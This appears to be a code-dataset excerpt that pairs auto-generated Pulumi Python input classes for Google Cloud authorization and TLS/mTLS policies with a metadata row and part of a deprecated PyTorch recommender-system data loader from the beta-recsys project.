hosts: pulumi.Input[Sequence[pulumi.Input[str]]],
methods: pulumi.Input[Sequence[pulumi.Input[str]]],
ports: pulumi.Input[Sequence[pulumi.Input[int]]],
http_header_match: Optional[pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs']] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] hosts: List of host names to match. Matched against the ":authority" header in http requests. At least one host should match. Each host can be an exact match, or a prefix match (example "mydomain.*") or a suffix match (example "*.myorg.com") or a presence (any) match "*".
:param pulumi.Input[Sequence[pulumi.Input[str]]] methods: A list of HTTP methods to match. At least one method should match. Should not be set for gRPC services.
:param pulumi.Input[Sequence[pulumi.Input[int]]] ports: List of destination ports to match. At least one port should match.
:param pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs'] http_header_match: Match against key:value pair in http header. Provides a flexible match based on HTTP headers, for potentially advanced use cases. At least one header should match.
Avoid using header matches to make authorization decisions unless there is a strong guarantee that requests arrive through a trusted client or proxy.
Structure is documented below.
"""
pulumi.set(__self__, "hosts", hosts)
pulumi.set(__self__, "methods", methods)
pulumi.set(__self__, "ports", ports)
if http_header_match is not None:
pulumi.set(__self__, "http_header_match", http_header_match)
@property
@pulumi.getter
def hosts(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of host names to match. Matched against the ":authority" header in http requests. At least one host should match. Each host can be an exact match, or a prefix match (example "mydomain.*") or a suffix match (example "*.myorg.com") or a presence (any) match "*".
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter
def methods(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of HTTP methods to match. At least one method should match. Should not be set for gRPC services.
"""
return pulumi.get(self, "methods")
@methods.setter
def methods(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "methods", value)
@property
@pulumi.getter
def ports(self) -> pulumi.Input[Sequence[pulumi.Input[int]]]:
"""
List of destination ports to match. At least one port should match.
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: pulumi.Input[Sequence[pulumi.Input[int]]]):
pulumi.set(self, "ports", value)
@property
@pulumi.getter(name="httpHeaderMatch")
def http_header_match(self) -> Optional[pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs']]:
"""
Match against key:value pair in http header. Provides a flexible match based on HTTP headers, for potentially advanced use cases. At least one header should match.
Avoid using header matches to make authorization decisions unless there is a strong guarantee that requests arrive through a trusted client or proxy.
Structure is documented below.
"""
return pulumi.get(self, "http_header_match")
@http_header_match.setter
def http_header_match(self, value: Optional[pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs']]):
pulumi.set(self, "http_header_match", value)
@pulumi.input_type
class AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs:
def __init__(__self__, *,
header_name: pulumi.Input[str],
regex_match: pulumi.Input[str]):
"""
:param pulumi.Input[str] header_name: The name of the HTTP header to match. For matching against the HTTP request's authority, use a headerMatch with the header name ":authority". For matching a request's method, use the headerName ":method".
:param pulumi.Input[str] regex_match: The value of the header must match the regular expression specified in regexMatch. For regular expression grammar, please see: en.cppreference.com/w/cpp/regex/ecmascript For matching against a port specified in the HTTP request, use a headerMatch with headerName set to Host and a regular expression that satisfies the RFC2616 Host header's port specifier.
"""
pulumi.set(__self__, "header_name", header_name)
pulumi.set(__self__, "regex_match", regex_match)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> pulumi.Input[str]:
"""
The name of the HTTP header to match. For matching against the HTTP request's authority, use a headerMatch with the header name ":authority". For matching a request's method, use the headerName ":method".
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: pulumi.Input[str]):
pulumi.set(self, "header_name", value)
@property
@pulumi.getter(name="regexMatch")
def regex_match(self) -> pulumi.Input[str]:
"""
The value of the header must match the regular expression specified in regexMatch. For regular expression grammar, please see: en.cppreference.com/w/cpp/regex/ecmascript For matching against a port specified in the HTTP request, use a headerMatch with headerName set to Host and a regular expression that satisfies the RFC2616 Host header's port specifier.
"""
return pulumi.get(self, "regex_match")
@regex_match.setter
def regex_match(self, value: pulumi.Input[str]):
pulumi.set(self, "regex_match", value)
@pulumi.input_type
class AuthorizationPolicyRuleSourceArgs:
def __init__(__self__, *,
ip_blocks: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
principals: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] ip_blocks: List of CIDR ranges to match based on source IP address. At least one IP block should match. Single IP (e.g., "1.2.3.4") and CIDR (e.g., "1.2.3.0/24") are supported. Authorization based on source IP alone should be avoided.
The IP addresses of any load balancers or proxies should be considered untrusted.
:param pulumi.Input[Sequence[pulumi.Input[str]]] principals: List of peer identities to match for authorization. At least one principal should match. Each peer can be an exact match, or a prefix match (example, "namespace/*") or a suffix match (example, "*/service-account") or a presence match "*".
Authorization based on the principal name without certificate validation (configured by ServerTlsPolicy resource) is considered insecure.
"""
if ip_blocks is not None:
pulumi.set(__self__, "ip_blocks", ip_blocks)
if principals is not None:
pulumi.set(__self__, "principals", principals)
@property
@pulumi.getter(name="ipBlocks")
def ip_blocks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of CIDR ranges to match based on source IP address. At least one IP block should match. Single IP (e.g., "1.2.3.4") and CIDR (e.g., "1.2.3.0/24") are supported. Authorization based on source IP alone should be avoided.
The IP addresses of any load balancers or proxies should be considered untrusted.
"""
return pulumi.get(self, "ip_blocks")
@ip_blocks.setter
def ip_blocks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ip_blocks", value)
@property
@pulumi.getter
def principals(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of peer identities to match for authorization. At least one principal should match. Each peer can be an exact match, or a prefix match (example, "namespace/*") or a suffix match (example, "*/service-account") or a presence match "*".
Authorization based on the principal name without certificate validation (configured by ServerTlsPolicy resource) is considered insecure.
"""
return pulumi.get(self, "principals")
@principals.setter
def principals(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "principals", value)
@pulumi.input_type
class ClientTlsPolicyClientCertificateArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs'] certificate_provider_instance: The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
:param pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs']]:
"""
The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ClientTlsPolicyClientCertificateGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
@pulumi.input_type
class ClientTlsPolicyServerValidationCaArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs'] certificate_provider_instance: The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
:param pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs']]:
"""
The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ClientTlsPolicyServerValidationCaGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyArgs:
def __init__(__self__, *,
client_validation_cas: Optional[pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]]] = None,
client_validation_mode: Optional[pulumi.Input[str]] = None,
client_validation_trust_config: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]] client_validation_cas: Required if the policy is to be used with Traffic Director. For external HTTPS load balancers it must be empty.
Defines the mechanism to obtain the Certificate Authority certificate to validate the client certificate.
Structure is documented below.
:param pulumi.Input[str] client_validation_mode: When the client presents an invalid certificate or no certificate to the load balancer, the clientValidationMode specifies how the client connection is handled.
Required if the policy is to be used with the external HTTPS load balancing. For Traffic Director it must be empty.
Possible values are: `CLIENT_VALIDATION_MODE_UNSPECIFIED`, `ALLOW_INVALID_OR_MISSING_CLIENT_CERT`, `REJECT_INVALID`.
:param pulumi.Input[str] client_validation_trust_config: Reference to the TrustConfig from certificatemanager.googleapis.com namespace.
If specified, the chain validation will be performed against certificates configured in the given TrustConfig.
Allowed only if the policy is to be used with external HTTPS load balancers.
"""
if client_validation_cas is not None:
pulumi.set(__self__, "client_validation_cas", client_validation_cas)
if client_validation_mode is not None:
pulumi.set(__self__, "client_validation_mode", client_validation_mode)
if client_validation_trust_config is not None:
pulumi.set(__self__, "client_validation_trust_config", client_validation_trust_config)
@property
@pulumi.getter(name="clientValidationCas")
def client_validation_cas(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]]]:
"""
Required if the policy is to be used with Traffic Director. For external HTTPS load balancers it must be empty.
Defines the mechanism to obtain the Certificate Authority certificate to validate the client certificate.
Structure is documented below.
"""
return pulumi.get(self, "client_validation_cas")
@client_validation_cas.setter
def client_validation_cas(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]]]):
pulumi.set(self, "client_validation_cas", value)
@property
@pulumi.getter(name="clientValidationMode")
def client_validation_mode(self) -> Optional[pulumi.Input[str]]:
"""
When the client presents an invalid certificate or no certificate to the load balancer, the clientValidationMode specifies how the client connection is handled.
Required if the policy is to be used with the external HTTPS load balancing. For Traffic Director it must be empty.
Possible values are: `CLIENT_VALIDATION_MODE_UNSPECIFIED`, `ALLOW_INVALID_OR_MISSING_CLIENT_CERT`, `REJECT_INVALID`.
"""
return pulumi.get(self, "client_validation_mode")
@client_validation_mode.setter
def client_validation_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_validation_mode", value)
@property
@pulumi.getter(name="clientValidationTrustConfig")
def client_validation_trust_config(self) -> Optional[pulumi.Input[str]]:
"""
Reference to the TrustConfig from certificatemanager.googleapis.com namespace.
If specified, the chain validation will be performed against certificates configured in the given TrustConfig.
Allowed only if the policy is to be used with external HTTPS load balancers.
"""
return pulumi.get(self, "client_validation_trust_config")
@client_validation_trust_config.setter
def client_validation_trust_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_validation_trust_config", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyClientValidationCaArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs'] certificate_provider_instance: Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
:param pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs']]:
"""
Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
@pulumi.input_type
class ServerTlsPolicyServerCertificateArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs'] certificate_provider_instance: Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
:param pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs']]:
"""
Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ServerTlsPolicyServerCertificateGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
```
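Because the file is tfgen-generated boilerplate, usage is mechanical: instantiate the `*Args` classes and nest them. A short hypothetical composition of the input types defined above (hosts and principals are placeholder values):

```python
rule = AuthorizationPolicyRuleArgs(
    sources=[AuthorizationPolicyRuleSourceArgs(
        principals=["example-namespace/*"],
    )],
    destinations=[AuthorizationPolicyRuleDestinationArgs(
        hosts=["*.myorg.com"],
        methods=["GET", "POST"],
        ports=[443],
    )],
)
```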
**Row 7: `beta-team/beta-recsys` / `deprecated_data_base.py`**

| field | value |
|---|---|
| blob_id | bca26cdf311b3acbe6491a5907e65e149e26370c |
| directory_id | 3079a053cf4468d8d8408b77c9b140174c6b2585 |
| path | /beta_rec/data/deprecated_data_base.py |
| content_id | ed32a7ffb8abcd45d4a1ac548f470e993fc05c9a |
| detected_licenses | ["MIT"] |
| license_type | permissive |
| repo_name | beta-team/beta-recsys |
| snapshot_id | 02609ddd27b76b024b38f2ca202d3595e49d460d |
| revision_id | 625189d5e1002a3edc27c3e3ce075fddf7ae1c92 |
| branch_name | refs/heads/master |
| visit_date | 2023-09-03T11:44:47.171273 |
| revision_date | 2023-08-28T13:33:59 |
| committer_date | 2023-08-28T13:33:59 |
| github_id | 247,511,463 |
| star_events_count | 156 |
| fork_events_count | 42 |
| gha_license_id | MIT |
| gha_event_created_at | 2023-05-22T23:55:46 |
| gha_created_at | 2020-03-15T17:03:32 |
| gha_language | Python |
| src_encoding | UTF-8 |
| language | Python |
| is_vendor | false |
| is_generated | false |
| length_bytes | 17,680 |
| extension | py |
| filename | deprecated_data_base.py |

`content`:

```python
import json
import os
import random
from copy import deepcopy
import numpy as np
import pandas as pd
import scipy.sparse as sp
import torch
from scipy.sparse.linalg import eigsh
from torch.utils.data import DataLoader, Dataset
from ..utils.common_util import ensureDir, normalized_adj_single
from ..utils.constants import (
DEFAULT_ITEM_COL,
DEFAULT_RATING_COL,
DEFAULT_TIMESTAMP_COL,
DEFAULT_USER_COL,
)
class UserItemRatingDataset(Dataset):
"""Wrapper, convert <user, item, rating> Tensor into Pytorch Dataset."""
def __init__(self, user_tensor, item_tensor, target_tensor):
"""Init UserItemRatingDataset Class.
Args:
target_tensor: torch.Tensor, the corresponding rating for <user, item> pair.
"""
self.user_tensor = user_tensor
self.item_tensor = item_tensor
self.target_tensor = target_tensor
def __getitem__(self, index):
"""Get an item from dataset."""
return (
self.user_tensor[index],
self.item_tensor[index],
self.target_tensor[index],
)
def __len__(self):
"""Get the size of the dataset."""
return self.user_tensor.size(0)
class RatingNegativeDataset(Dataset):
"""RatingNegativeDataset.
Wrapper, convert <user, item, rating> Tensor into Pytorch Dataset, which contains negative items with rating
being 0.0.
"""
def __init__(self, user_tensor, item_tensor, rating_tensor):
"""Init RatingNegativeDataset Class.
Args:
target_tensor: torch.Tensor, the corresponding rating for <user, item> pair.
"""
self.user_tensor = user_tensor
self.item_tensor = item_tensor
self.rating_tensor = rating_tensor
def __getitem__(self, index):
"""Get an item from the dataset.
Args:
index:
Returns: users, pos_items, neg_items, pos_ratings, neg_ratings
"""
return (
self.user_tensor[index],
self.item_tensor[index],
self.rating_tensor[index],
)
# index = torch.LongTensor(index, device=self.user_tensor.device)
# pos_index = index[self.rating_tensor[index] > 0]
# neg_index = index[self.rating_tensor[index] >= 0]
# return (
# self.user_tensor[pos_index],
# self.item_tensor[pos_index],
# self.rating_tensor[pos_index],
# self.user_tensor[neg_index],
# self.item_tensor[neg_index],
# self.rating_tensor[neg_index],
# )
def __len__(self):
"""Get the size of the dataset."""
return self.user_tensor.size(0)
class PairwiseNegativeDataset(Dataset):
"""Wrapper, convert <user, pos_item, neg_item> Tensor into Pytorch Dataset."""
def __init__(self, user_tensor, pos_item_tensor, neg_item_tensor):
"""Init PairwiseNegativeDataset Class.
Args:
target_tensor: torch.Tensor, the corresponding rating for <user, item> pair.
"""
self.user_tensor = user_tensor
self.pos_item_tensor = pos_item_tensor
self.neg_item_tensor = neg_item_tensor
def __getitem__(self, index):
"""Get an item from the dataset."""
return (
self.user_tensor[index],
self.pos_item_tensor[index],
self.neg_item_tensor[index],
)
def __len__(self):
"""Get the size of the dataset."""
return self.user_tensor.size(0)
class DataLoaderBase(object):
"""Construct dataset for NCF."""
def __init__(self, ratings):
"""Init DataLoaderBase Class.
Args:
ratings: pd.DataFrame, which contains 4 columns = ['userId', 'itemId', 'rating', 'timestamp']
"""
assert DEFAULT_USER_COL in ratings.columns
assert DEFAULT_ITEM_COL in ratings.columns
assert DEFAULT_RATING_COL in ratings.columns
assert DEFAULT_TIMESTAMP_COL in ratings.columns
self.ratings = ratings
# explicit feedback using _normalize and implicit using _binarize
# self.preprocess_ratings = self._normalize(ratings)
self.preprocess_ratings = self._binarize(ratings)
self.user_pool = set(self.ratings[DEFAULT_USER_COL].unique())
self.item_pool = set(self.ratings[DEFAULT_ITEM_COL].unique())
self.n_users = len(self.user_pool)
self.n_items = len(self.item_pool)
# create negative item samples for NCF learning
self.negatives = self._sample_negative(ratings)
def _normalize(self, ratings):
"""Normalize into [0, 1] from [0, max_rating], explicit feedback."""
ratings = deepcopy(ratings)
max_rating = ratings.rating.max()
ratings[DEFAULT_RATING_COL] = ratings.rating * 1.0 / max_rating
return ratings
def _binarize(self, ratings):
"""Binarize into 0 or 1, imlicit feedback."""
ratings = deepcopy(ratings)
ratings[DEFAULT_RATING_COL][ratings[DEFAULT_RATING_COL] > 0] = 1.0
return ratings
def _sample_negative(self, ratings):
"""Return all negative items & 100 sampled negative items."""
interact_status = (
ratings.groupby(DEFAULT_USER_COL)[DEFAULT_ITEM_COL]
.apply(set)
.reset_index()
.rename(columns={DEFAULT_ITEM_COL: "interacted_items"})
)
interact_status["negative_items"] = interact_status["interacted_items"].apply(
lambda x: self.item_pool - x
)
interact_status["negative_samples"] = interact_status["negative_items"].apply(
lambda x: random.sample(x, 99)
)
return interact_status[[DEFAULT_USER_COL, "negative_items", "negative_samples"]]
def instance_a_train_loader(self, num_negatives, batch_size):
"""Instance train loader for one training epoch."""
users, items, ratings = [], [], []
train_ratings = pd.merge(
self.ratings,
self.negatives[[DEFAULT_USER_COL, "negative_items"]],
on=DEFAULT_USER_COL,
)
train_ratings["negatives"] = train_ratings["negative_items"].apply(
lambda x: random.sample(x, num_negatives)
)
for _, row in train_ratings.iterrows():
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row[DEFAULT_ITEM_COL]))
ratings.append(float(row[DEFAULT_RATING_COL]))
for i in range(num_negatives):
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row.negatives[i]))
ratings.append(float(0)) # negative samples get 0 rating
dataset = UserItemRatingDataset(
user_tensor=torch.LongTensor(users),
item_tensor=torch.LongTensor(items),
target_tensor=torch.FloatTensor(ratings),
)
return DataLoader(dataset, batch_size=batch_size, shuffle=True)
